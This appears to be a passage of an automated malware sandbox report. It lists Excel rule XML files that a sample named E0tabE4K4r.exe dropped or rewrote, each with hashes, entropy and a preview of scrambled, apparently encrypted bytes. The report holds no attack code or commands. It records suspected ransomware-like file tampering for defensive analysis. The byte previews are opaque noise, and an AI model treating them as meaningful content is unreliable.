                                                                                                                                                  SSDEEP:24:Y4lKeLEXXni5A4P3FpWIvUobUw1UTZwwffJYQbN0Qs43Oa32bD:JlIi5A4Ptv8wuTZzI432D
                                                                                                                                                  MD5:72CC4572BA6FE893FE1816D4E007D25D
                                                                                                                                                  SHA1:DF54C3595A4CDC2A3FB25AD1152B25958C2F789B
                                                                                                                                                  SHA-256:DD585F4E14FB20DB4B7A3C51BC0A158CEE4B8DFE6C5340A61C9559CC7C0E5BD3
                                                                                                                                                  SHA-512:F938427F7D168C95225EF3E4B129C6B2CC2B01F2E66F096D6774AC634B0D02E6C15CD85499852EC0A4D9A5A316D46CCF63EC4815D479C779E39E6BE3B6915C56
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.(.ZH...Y|I.ek....[.q.p.C^u..G;6:..eLk[..+.$.k..n.....8.G7!...m....;j.jJ...[Wh... ..|..U...-....z....MJ#j..'....I...tMI%....A...U]Xa....-%:X...E+......]........j.;.f...l......p.... Rz.c./v..90.U....h..!.e..R.Rt.?'*:.>J../.G_..^##.s._....(>.s.4%.G.p.....y....=.Z......9x.G6.]..Bi;.I..W..Ox.E=.0.....k.&^...8.....@....@.p....c......<..j.Jr~h.p.oh.../.g,.u..}Z...~&..U...v.....a..d...?!.S?,m.M......}$.{*..4g..+jW_.......M.0..x.A.... O..........]....A=..P..n@.T..*15q.x4...T....L...k.<..k.....6._....A...-....Z..x..........N.l...U.AN....W.....=+|?.c..0..cf9:.....s..bu./.m.?x7k'Jo.m.f"H......9...*.q..ul.....cN..._.U....G..O-y..~.g.n.=...} .1c..-...;FW...2.<|..(......A..F.~.^.u.....#x...-...G./..s...M..7,.....Nx..l__'G..#........pMu.A=K...@..b!.(h..1.[LcA.S$...s.el....D..K"H..MNy896...........qU....#k..)k.k.w.{...`4......k........'w....;....iEy_.2&.o].......3.D*..l....."...U....e.,.+...!....q`....n..gn..?..9..Z.i.......5.)7....v.o......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500002v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1145
                                                                                                                                                  Entropy (8bit):7.80319812894144
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Uebb6KdSMB3/SabUcEwmyEdSMfMkbbD0SyjteW1wmuBdLFV2bD:Uen6GSwy/qMfMSjyJ1VuBruD
                                                                                                                                                  MD5:382B98964D90E3277FD09E4FE3EDBB70
                                                                                                                                                  SHA1:41A0333387F4070F5CB4633E921154FD0340295B
                                                                                                                                                  SHA-256:1CFE5A8E9121EB06FE93C70FA2855D9D00E29B09C5CDACD6262CFB0BD37F403F
                                                                                                                                                  SHA-512:7E86A9588CF180715B949D64A0A636823F1125072B5D131E20C6B505D39B58884A97B483C4267BFDE029C68015B4E70B810A42E93BD397D6D1B4A39C4856832E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.Io.~D.0...%..A.`.r.....d.8.9..../.n.1.HQ.B.8>r!~.+...U.T...../.I<[.Bh3..e..r.Y.............V..V.....}.....E.r...-......\..n#..G..j.J{..k..b.....B..6o.].7U...eWh........d .S.K(8..o{Y...k..u.k[L.C.....]."...{<fz2$.z./.0...Y.fU..d.\......*W.i.m..aV.K...c.G......AH.N.P....>^.&+...BPhX.|M.....7r^..J....L.Mn|...M...M.8ZR.4.M...42..}...b;Q...t..{.W...\.....p..1..!P......_`F.r....j)Q*.......!..S.vj.... .............^Z J...B.$......%.\$x.@^..[..m.U.^/.6.ZM..I.4m.v.>..;y...i.{.'..O......3tA..g.../Q...F.K.,......e.`.RmQ....~='..X4.k.l..g.y...#..F.@.~...j..].......<...9,..L...<<i..vc...[.g...4g.U.m+......-.D.c........^.vci/.J..|.ql.tbjI1~?...g..|...yU....e.>+...w..2oM....5i2.......t..BN.0.u..~..8..J.F$.v@;.;.j.D..cE'R.7..>,..Q.P"J.......x..n.^Jq3."..B.[.RFc....x.gYHU..N.GV.a...(t^+...D.'._...u..^.....U/v.R\A..7.u....Z5Aw>..0J.j...7....=.RT.\X......P%..pD.!.G.......% Tz_B....k?r..0'.Yy%..$.kFc'l....N.x..q..M!;.37[..(&.... ...OA..ti^.....x..a

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500003v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1145
                                                                                                                                                  Entropy (8bit):7.819261254839674
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:kLR6fNxZXYNrmRbyfTDMDgf1J+BE0lMpoZMr1/kZ0440oO33pGZacSKy+2bD:XfZXAIivzpgMymxKsZSKSD
                                                                                                                                                  MD5:E8912810F6B9792C5C2801CBDAFF2705
                                                                                                                                                  SHA1:5968445BF6D1131F2E29CF3BA963238D3F0AA716
                                                                                                                                                  SHA-256:5B39534E19EBAB30F3BB71506BFB61CE0A587CBA10C52B370231EAC308CF8668
                                                                                                                                                  SHA-512:2E02FC991FC02CCE53A6A8B68C5DCF05BB3809CD15AC387E3CC615647231A8FF5A10DA892BA0A3480258535042FCABE794A045B2418D1433F76D004B68368563
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....CAh."C..j`i.M../.s.....e..8........).T..?.....n..V......;Y{....U.3q.6.}.B.6."1..@n.$..m.." ..fyjD...z?...Jl...(.;!..y'..nX;.R..+.'<........%...........u.T|.."-.f.....&!...j...Do\h....#... .>.)Z.t;....H......D...d.\...{.V.Asw9.@..L..oQ.`=....<cS.=.../.N%%..f.........."v.(d..^.Id.....5.OCUlp./+..<R...x0Wx.y..^...=...K:.._F1...A.f.{.Y.\I../=.L.g.Rt..I...[...&..%.2...t.O.\..*).9.Q./'T...R..,g..m...I...~1.#C<....t...^>.r.%.. .k..[..y.q...Q.\...V.L.5..4..i.......J.D}#..%...(G.......o..C...g.w.-..E.Q../..H.....L.Z...C9dC....,|.}v.2r.&..Q...`Os1.....$......X.=:.{...a....o...*..8...s9.Z.Qq{.#.5e...Z.........,l.[,......G...z....p.....m...K..Tq...b./....4...w.....#t2.*B(.1. w...7...1l..$..Tx...0..0....X....g..........>....>.L...F....F... "+....f.dN. ..R)..x...c...+I..%0...D87....<...*[T..(.ZMB..ES`...h...?..x.[..D...,..[m.1r..2\D...Irtuw7<.......%./...\-@...k.aP.$".U.E......o.".....Y,.E..w.....g..3.G...M.%.y....%m?..9$^._.p}.]..K:.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500004v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1145
                                                                                                                                                  Entropy (8bit):7.7983883092218225
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:b62fX8Qncm9rMswRbxpkbdM1yzmKphRyNYXyG2bD:22v8ycmlMHJ/idM0uNYMD
                                                                                                                                                  MD5:949DACE08D0D0088E6EAF166301E17B8
                                                                                                                                                  SHA1:4C4B16BEFC3C5E62FC5EB12EA2A2F661AF7E713E
                                                                                                                                                  SHA-256:8F0AA91423C61360B9C0390605649D92BF38511DD869E2FA1F111BC5E82317D2
                                                                                                                                                  SHA-512:CC0371D0C8EE221B9C2A3EA93C5298952CD305516274E782CDF2EE31F163EE396CCF4A79F4154FFB1F413CB060BD67AEE2601C22D6440F75D179BE0DF65B56CE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..S....>....}.{..>...4..t&.ER.o..`f. ...F.f......^.o'..Q........J*..,.z......dC.*.*..J...-.^.......;).}...G6..t.2UL.o..l..6.k..._*..`..^f..._....'..........Z....}.@`.Nb...2.z..U[...F.F..`:.7ois..} +.[W.E.#....m...0..@.V4...,:.G...w1=.p.......be...%...Z.z..x..{N.h.M..2..._.. .i...U.yE...;..zAa.T.s$2..p..J....Ce./.....<....i....[...b...O.._K..{.n`.r..qr]..2......j.\...U5O+.1...O.)....R..X......@C.%0...HY*..h[6..f.R$...o..4w..d.........r..2...c.9yr.Y.c~H.v.`.A.T.w29@;.Sa.....b}..=....%.Lq[.{..+...}....-.L....l....uE!......%:...:Z ..F....0%e@..uX..X...K.'.h.R.../.2.I;......LI.]......(T-pm.r..D^Uk~a.Y.+5.p..[...T.}&VY...Z..f}.!.(.hMLa....>..`......s.2A..cx...r..j...S..)........e.0..k.1....!AUr..[..d.K...L../0S.s...T...T......=}xM..Is.3...D.z).....|...3t.<3>..`...F...].....T1X.=...b..;.4...z...j.[.Y............[.j_...0Sc..5'8..\........ZrN."....... aA........v.R..fAy.."...w.v......i...g.l.<..w.Q...S.{.J>)I.E.....IMX.}..J..-...^.{..&

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500005v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1144
                                                                                                                                                  Entropy (8bit):7.802097745498747
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qBcrbvvpn03ddKuVIvA3NjXOBD3E/8KwxLueOf2I0v2bD:3vR0tIuVIv+N7OBDEUlxLq2I0MD
                                                                                                                                                  MD5:E9C2DA0F8DBC8DF096211095F8EF5D7F
                                                                                                                                                  SHA1:080C13FA63CE12051DA0FD4D09CF0D391BDBA655
                                                                                                                                                  SHA-256:C8B8C2A63CB5ABD5AE4CE60C2FDE679F81FCA3226886268507755B039948D850
                                                                                                                                                  SHA-512:5780A5C6F898AEC67AA8B6610117948434AD575F6A7AD86912AAB5B5ECD396EA0024769CDE1B4B46A349603EA046A599A9A9315A1D93B52A4F27C9531A336E2C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.s....O.@x..d.=..s.u..T7..4+\'8..b..?{.Z.M2P@..3T2.n.M....`a...S?.a>...DM...<Ua/`.g...U...m..B.M.`.w.=<.#.....,....C:...,%n[C.)!......xX....6.._....B..8.,..../.L...3]...D..1......c.c~......f,Q..bE..}.F].Q...RR|.....s...-...[.^...e....... ..K...CBN..kA...3............Fq........r.$..W;...x7.f."..(..?...=.-]...t....&.U......o...V5k..-...C.w...K7H4..`.}.....g%.%c._x........g.Y/c....!........j......`..N4.....s..)...y\|.W.-h..*.....Y...BA....'....5.(.S`.r.b...{.......H......._n.h}....t.H.U.m.6..1.....f.....C.r_O......... %..q..F..8...X.ir......^...5.^..x.W...3.g........v.nC.HkW.....;D.H...........~H...e...j.8....z..+kf^.5..].....G...P~-..$j..Y......Z.]...2.P0.N.y.p?z..SR....+L..Oo..bCs..,.w.g.?..]^.9.w(.h..4}.w.:t .......:)..-..Ao.&.#z..w.WR..,d.....%Z!*....#.8LrL.cF.%..T.o.$((..j._V....~0d...>z.w..)m.......msQn...W.P[....g..]..Z.[;I......ZQ..B.K.K....n>..H~..!C..6.s....K!..Y.C.9..,.....\..MZ......m>.t..".3Qf%.,R....6..'/.%.#^b..1....b.R

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500006v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):848
                                                                                                                                                  Entropy (8bit):7.746025823212721
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:w6DWfGYL48F9DAE6pfbxF+aNS6VtUlTcl0h2bD:w6QGYL4wDLAxYaNSkKuC6D
                                                                                                                                                  MD5:8A4AE31A29FE17EADDC7B6189007DA5D
                                                                                                                                                  SHA1:4CBDAE7F6CF0ECBC41BDEBE02DC452F94B2BB04E
                                                                                                                                                  SHA-256:9E23F7547677D66D6E5ACBEE12659BD65515C1077E613EEAE55BDDC35993539F
                                                                                                                                                  SHA-512:EDEBB9D69C16A7DDEF3E1969D461A7A08B46F026CE086167CFDC426E145743BE0127605E463DB48F2F20F5DAC73F9F2A202843F55DA78B66E23045166B40796E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.&=b.R..X....A..~pwL.h.._...N.....!...Ly.JVV..r.L.>(..]3.Y.p,....~.^.I...5..&n[..,....H?".a..K.......hu...U.k.Q.'..mGk.|... .....*M0...S6...r.).ybK`....$...._/jE...N...@p+....q..z.*B.JK....N..j..}=_.....j..#s^..........].Vj ..K...?L.<M:...Hv..2......D.nO>..M.....A@..T8.....kh.^..fZR.8...O....AG..V79.|.,w...EG....M....8"5.b.W.....p,.....Pk....0.G.Z.%.....Xu.`....;EZ..e.".._........'..........X........FX#=e...(..!7.j@...1.c.1,...,2."<..(....U...m.....l..C.U.sU=.......4I[S......8b._N....{.e.....Z22...ny.'.+gUzb.@.v6....HM..$..hY4{.....9.6..OL..j1.....+6.J...P......U%.....Y4aH........1.Z.'.?..W.T...W...."..4..........0..........e.=....&.%.7...A....%..]B....Um^..|..;......l..$*....B...u.A...`.YzU;.....a.2du.7..v.....b\.......0..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500007v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):767
                                                                                                                                                  Entropy (8bit):7.692643816203752
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:po23QTYJp+u+d8VjU+L/CnKGBNBL9XftgqRwlkTN4xEmb06bVQXnVrHozSUdNciD:pmTYyu+CBLu9B1aqRwKhnoVQXRo+2bD
                                                                                                                                                  MD5:36FE5B17ABE5B40D2714A4B20F9C3C01
                                                                                                                                                  SHA1:ADC9D70B80E20D12B782BE2B401876005A976992
                                                                                                                                                  SHA-256:555A43AC203569A79543B438CB0B36B4542F56C58A22FB98E0B16CCCCBE3304E
                                                                                                                                                  SHA-512:31325608457B33C4E0E076BADB7D6D312FDC9A2685215B6550CDC9B08D4CC10044665C1CF208B5F72E3E32626F41E386949EF4C14A4D790756E81DA024F26C4E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlfe......l[{..6.<6.Xf.{......l...4.o..H."@.X.J.....r_>.f`....N.,y.DA.XW.D..............$...C.9.$..l_.......Da>X...81?.0.m."...m.3J..n....[.5.]z..^.{b..b.u...^B!w....y._..&`9....i...G..c8..v.1Oh.@.x.^z.5..g..8.).wx.TYe.P.]H{...}..R.vQ..4..-."....v+.d....@cS..6g..?.../....S.#1..J...Z.VY....`..I........A.......w8wG...=A..V.L...#...AK.....y0.d5hj.!.M.PBu.~..U.O...T.,.....B..7..J.....Nh..,....v.....7.m....7..K.8A.tH...Q.S.#......p...E.r.db.....<.....'.uA._...Z..,...g.[9D....2....T..*.:.....Um.7E.H.Y.?.E.....a...W3&.:.r.l.g..).6.k...... .&......uo.^fp....|MP..Y..?de.!.{8$..s......|E.8.....m.2.....!..9p..N...f.,...u`#o.G...A..3..XxKDf..".D..^.v..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500008v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):845
                                                                                                                                                  Entropy (8bit):7.749714702924726
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:xToXIC8mI5z84xD7uZx4F5TltQdmsRQdLNnCR0HJw2bD:xTK983d84BucF94msRmNCWJjD
                                                                                                                                                  MD5:53803FAC0D3CFC98E14CB34FF5889368
                                                                                                                                                  SHA1:ECBC20C4CCCA797860C2B592DE19594ED054A523
                                                                                                                                                  SHA-256:C66AFC28568DE2A4AF1B79B4AF5719F10D384B38E07A024A002FE0EA990003A3
                                                                                                                                                  SHA-512:0053D692F63771FC42CED71A0A3506077674E4648FA07F331AA82B17D6DD1921DBA12309BFE4D89AED461B235F307301D6BE840E8889839F33A05C9EDE0FF032
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..8P..-y0.w....>....l6[...m.nd._Rh...)..0.}.......,.80W]1.D...*1W.H..k..a..[.LRc,n..cj ak...J..oy........b:.Ng...;...../(C}....c..K...7w.qzuXE.D.\.....>....d.~..bb&.-.[|kr..........:...F...t......I..+P~.@F.'...fD@|f.<=.:.n..E6)...d.........1s.i. ....kc.a... .>..!]...e..=]i...r....=M9B..k..<..J..V|...[......Y.8.n2..o*..%...T...k7.<..e.,.^E.7..0.T...p..\@V.d-h..L..sxx`0q...*..S.K...j...[........c..4#.....Oj.F@...6.../../..gX......... h*...}x.f.....KF`.G.+@}.!-..O..}.Ls..B,..M..."F..7..20.@....[ft$)rq..............34..}@..B.8....l.................5.1...D6...9..l>..G?|u+.(=.h.3K..s.x+q.c.*8..U..b.Ak..............S,./N......JJ....!...0..;..H.v.zI.M(~.....9."`_.K.....{.M.....M.....bI.P~.\=.=....fJ.F.JI.R.ATv.xY..J...y.|.n.7..t...{mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500009v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1233
                                                                                                                                                  Entropy (8bit):7.827268486292539
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Bnysmh484XBqLAnnMs8YH6Xilnud8q1nOugSoOqJuMV7D42bD:xmhtEblnudZggQV7DrD
                                                                                                                                                  MD5:E2319CE0404FB1FFE84D857560D38A36
                                                                                                                                                  SHA1:AAF2EA2495EB60D44893C828DCD19D7BAD310C70
                                                                                                                                                  SHA-256:664339C85B576EB57B06DC441B4C8C9FD3FD8405AEBFD8F7C2696EBA1E0C4AF9
                                                                                                                                                  SHA-512:8E0EAF605D550673323FDCD2E3775A1BF8DCBAFB3BE9425DBD2AB4230C280AA507016071CF9A409CFF933205E8DB316240F18B9B0E3E044705EBA844E8F193E9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....eAl.]P....j..@Z.}...,._{.Q!.t...n....%.D..........7j.C.55y."...b).zZ..3b.\...3i.^.l9..P....rtw"..,GV......t._6.....H.`...Ej...p......A1.V.ly].....CW.4.2.l...m.u.Y...."h.....a,!.....Dd.:.......cY....~.W.;......rxub..X.1...;&t.G.(t^0.|...(2UPw8hb.9........g.L...s.n...x.....|.S5..................<.....XGe.S..d..._->dy.._.4k*......_.-......_ .X.K.....o...x.,......"!....?3.&...P.(@s..y..".y%..".e.i.P..F.N.}..J.G..G.K....S.R......&X....F.....\...0..r...1.%./.%.Q...x..H....w.#).=,.]......F.b.-...U...0.-U@M..Y..%0..Yr.....y....^.S./[...t.`u!,v.=...t......|.C>.t....^.....=....X<2./..._...q.....?...Nj.....>...Z.......j[..Z.\..F.Gw...(..l...nR...L.1........{.r.4.Er.Z.6.D..g.7g.D....I.M..,K6y..ye.1}...$.tl... .y.2.r........./.T.B.<...M..2Edm^!.+.I...H-..D...e2..J~[F..(....n.Q.P.j.Kz..Q.q<`........c....0...(..u.....l.x'i.f".O.=,..YW..4..e]..).E...Pa..^.5.R.#.7.%2.\.......D.....$...'&.^.`.....^....f.mf~a6..O.G.-..$r...U...-.^,)$.}...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500022v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):934
                                                                                                                                                  Entropy (8bit):7.758092631392963
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:96nHjMdnk2PiGGaAl+5VLN5U0AD3TLeIvHmAL8Uh2bD:ojMK3aALX8BD
                                                                                                                                                  MD5:A2834575243C8EF855D3076685202458
                                                                                                                                                  SHA1:B6A3B497045CCA069BD0B6F82AD1D10BF9E5E217
                                                                                                                                                  SHA-256:D2169B6014F44636A174C20C8CD327F9C5D28C91FD6F632003E514B86B1DEE5C
                                                                                                                                                  SHA-512:7BA6836769359FD58E5B6F239324A6859D9B454F5F042F4C55B2BDF5BF497DE6D5BD4E9CCB466B2C74BC47E274AF26D4212EF6FF7C38D1E6C96EF40343BDE7B6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...F!7BV'.V.2....`Y.=xx..K.I.&..`.W....8..Y..;C.Zw-...g..Dt0n|..q^.;CP..p..P._..L.g._w.W.oC..r....}S..A[...`HL.,<....p....*..9..)...]E...#=.K...Z..1..B(.PG&.......Wj......V..u.rz......-....._..jL....@-...k...'..#9x..7.g."..PY...x9...`.J......E...P'2....7.....{..O...).U'.<5.g(c.....j.~n......<j..-*D..k...d2.S...JkN./...a...4.U.......Po.t.......}.}.... ...}../.w..b.jX@..:..0[..v.z....D.4.....x.Fx......z.X..y.k1dP..[.{..N.|..[0....(uV..ZV.....wz...;.."3......x..B..@Xcz........4!BJ...j}...Bc..>i.w.(..7....&..Q..{...6..".{Bcc.b.0..b..F....+a.....#.Z..:D.j...\.....|.B.........J.~V...z...1............t..&.....Xw.#.j.N2.f.5....9....W.o.[...gy...(...Hm..U..m./...\.....[.....@N...{.o...H...I9z.E.._..b..._..-.mo. ..+3...Aac.\.-\....=7'm..I..=O..9#..O.s.7.O.x..L.iS.#.Q`B...'.....Oa'.......^..Fvp.u...T.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500023v4.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):969
                                                                                                                                                  Entropy (8bit):7.770374447963218
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:7atamX9yYFNG8OcYWY28Qkp1kpdbLCvzrcQ4yoNTVd64qDX2bD:uX9yYxOcYf28QkadbLCvsQQNTVd64qDA
                                                                                                                                                  MD5:4CEA2793266F41C41F61798513F6F783
                                                                                                                                                  SHA1:29C710844A98A462EB5A2EB9BE5B9CBDF314CEA0
                                                                                                                                                  SHA-256:442296B7D72335C51036DFC87B226B681716276CFD35779C30F14500209D1157
                                                                                                                                                  SHA-512:E39B6B54D52ADA1F6C63C7F0E9E2808FD01A23CF69338AA334248F5D669FAB831E8A465885F5ED63FFA037004A123149CC922986FB76CE6107B2332F9AF4B87C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..P.J..2h.....Y.PY..a=.lY.=-.C.... m.u.?..cbA..h.)..&d.qn..<DE[..b..m....je..<.sP.G.#.w..m6iU...*..X>E..".z>y.;..7..a..bS.w!&.Z...$.z.ng..n..bW.}.....E/..U.Tvy...5.2+...*y....kd?..>.....t..^..C|..m.s.....e.AT...Z!.. ......%..4..D._?....l...G/.......zV..G.Qf@.P^.3.H|..7..<{....tG.....9D..IxQOin.........9?d..I. d.'3.(wS.p...q#....6..e.....O.!......J.@.j..... ..9..(..AU..B.L.c...... .w3{p...J);..k.^...<..E....7.;...80....B..n.<i.l.i..!.d........j.D.;E)5.~...].3.9.RLbr.S.$5....V.6.9.CZ.gb..$7...-mQ.$.p.;RO[\?:....x...$....Y...I...*..D...lK...C.U.+:g.C..}.8.s80n.Oqe...4.M.qO........'..mBx .|p..D.f....(N..A]..[...{,.....e....:...m..qM..B....9.0.s...%Gf......3B.q.(w.......e..*...7d[Q...L-^....d..r{X...`.O.._k...W6 .......+1.{.._..Q..jF....J.-Mw.&*T...Y......Co...}......)9.....0..F.p.u.....d.....l.......@$.@...W......@+.)..s...op5fnTV..O....+....'mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule500024v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1467
                                                                                                                                                  Entropy (8bit):7.866190573534479
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:mq6Kw4S5aHkw/ZSD0Gp4/zbxiW4fswak4xuL5bSBJ3M24a8NTAe4uS/JRzQvdeBc:m4S5hwHGpyz1iIwYaSBJ3M2iNTAVXslX
                                                                                                                                                  MD5:5046C7EADD146962D2F7D689E030C95C
                                                                                                                                                  SHA1:3B0948E5AC1E1A4B8DCCCAF48BDD4D0C1676880D
                                                                                                                                                  SHA-256:42C5C82360932F594D5B34A5BEADF484E4305A060941293DB2E03CEB5F5567BC
                                                                                                                                                  SHA-512:2E384CA402223793F63478B0F8951B48BA7D16FC6BFBB715D50AB2954F37CC1EC13D432EE51EBDC7304C95D67821D6B61C93665B07D75FFAA9ADF5B67860EFF4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmly..k..sn..H*.L+........Pf......p......b...piu......ey(.L.M.kg./._w..,.X8.C....E'z..t.lD.FP......E:2.D.:g....O2.lI..@...@...S../....]..;...q..sdd=Q?.TU.3.....4)..p.....|i*.S....H?.fv.1.a.|RVN&..m....Z.1.l*V.{.z.f...bn*.....Xt.......F|Q.0.w...{.-..<8.H._?.h......"..;.u[..bH.....==..U.o..q.NT..i`.....i3rO.:.a.....v.p...U.U9....jc...(.=..Da.e.t.F....2.M...8Z.."H..% ..L...p...hA:.P 1\.b\..../6..g.s).^..)...1.'........}....P..Cf.Zh..g.5.B.e.`k..[z..!@.sYa.+k....{{K....v4y.......St....Ob../.Y3....a...i..!.0..W....A+.m.:h.t..sp,..A:..de.;......VP.J..<.v..(d.4.....Z...P....Z!..+.T.?.8d:.*.O.1 .>..D?..."0.D.]...&0X...Q]:h.Nm.:.<.e..%:;P..6._...A.AK..;_.......J."nb...?.^.SL.........K...sh... .h..u..P.....A.1.]....GK...nv.K...q3.|...kw.....;.v_^x.<..$....'.o.>...r.........S1.Q<.@6V..`.W.~f-qG.0R..f0..$Zw..=....6[q+;.a~~[...G.Z....A.2.....H...Q.v.{.?....j.......u.......E.vR2...4\~.Ih@...r.....!7v.w...f.9..z......j.... ...w...}N._r..B......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510000v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1397
                                                                                                                                                  Entropy (8bit):7.849867895515429
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:3qx3KVUNNGS4fArPHksw8hc3+jrZ6/pHWtDsAsHwZHnIrO16R1VCZyh2bD:3IiUG3AzH5JvU/ssAsCHkhdwy6D
                                                                                                                                                  MD5:E8480E3EE047B79B06E567AD96D93959
                                                                                                                                                  SHA1:E21976DA525440AC8A5376F9C6115D34B27EAF92
                                                                                                                                                  SHA-256:E1F7E207CF2897A3FD90523AEEC7D7CA36A71833E4EA8C538A7284BD489BBA9B
                                                                                                                                                  SHA-512:7C62E5D5F340202C2288866DE76F8C1F646C95659CAFDF13932C6F8FC957B10BACE74EDC8D184FF27465A7753B9E904B33FAF6868052E1E0168AA52E50DBF284
                                                                                                                                                  Malicious:false
